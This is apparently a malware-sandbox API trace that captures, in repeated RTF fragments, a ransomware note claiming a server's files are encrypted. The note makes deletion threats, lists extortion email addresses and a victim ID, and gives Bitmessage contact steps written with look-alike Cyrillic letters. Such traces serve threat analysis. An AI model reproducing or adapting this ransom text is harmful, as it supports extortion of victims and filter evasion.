\\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 